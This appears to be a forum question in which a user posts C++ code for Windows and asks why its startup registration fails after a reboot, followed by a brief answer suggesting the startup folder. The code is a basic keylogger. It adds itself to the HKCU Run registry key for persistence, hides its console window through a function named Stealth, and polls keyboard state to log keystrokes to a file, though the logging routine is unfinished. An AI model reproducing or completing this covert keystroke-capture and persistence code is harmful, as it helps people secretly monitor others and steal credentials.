# Add a Program in startup using C++

Tags: c++, file, startup

I want to add `cpp` program in startup.
Here is a code.

```
 #include <iostream>
    using namespace std;
 #include <fstream>
 #include <stdlib.h>
 #include <windows.h>
 #include <string>
 #include <tchar.h>

 int Save (int key_stroke, char *file);
 void Stealth();

 int main()
{

/*/////////////// START UP ////////////*/
TCHAR exepath[MAX_PATH];
GetModuleFileName(0, exepath, MAX_PATH);
HKEY hKey;
LONG lnRes = RegOpenKeyEx(
       HKEY_CURRENT_USER,
       "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
       0,KEY_WRITE,
       &hKey
   );
   if( ERROR_SUCCESS == lnRes )
   {
      lnRes = RegSetValueEx(hKey,
                     "what I write here ???",
                     0,
                     REG_SZ,
                     (BYTE*) exepath,
                     _tcslen(exepath));
                     }
 /**********************************************/                    

Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");

return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

fprintf(OUTPUT_FILE, "%s", "[WORKING...]");

fclose (OUTPUT_FILE);

}

 /* *********************************** */

void Stealth()
 {
 HWND Stealth;
 AllocConsole();
 Stealth = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(Stealth,0);
}
```

This code generate `LOG.TXT` file when you enter any button from keyborad.
This program added in startup successfully when I restart the computer I checked it in `Task Manager` This program is in process.
But when I pressed any button the `LOG.TXT` can't generate.
There is no error in this program.  And one more thing I copy paste the `startup` code and I did not know what am I write here `lnRes = RegSetValueEx(hKey,
                         "what I write here ???",`
I write any thing or not it doesn't affect on this program.
Can anyone tell me why this is program is not working when I restart the computer otherwise this is working well.
I am using `windows 7`.
Can here is anyother method to add a program in startup using cpp.
I know there is manual method to add any program in startup folder.But I'm not going to use this.
Thanks...

Answer (score 0):

i suggest if you are using a windows os then make your c++ program to a windows executable file and put it into windows startup programs
http://xoax.net/cpp/crs/visualcpp/lessons/CreateExe/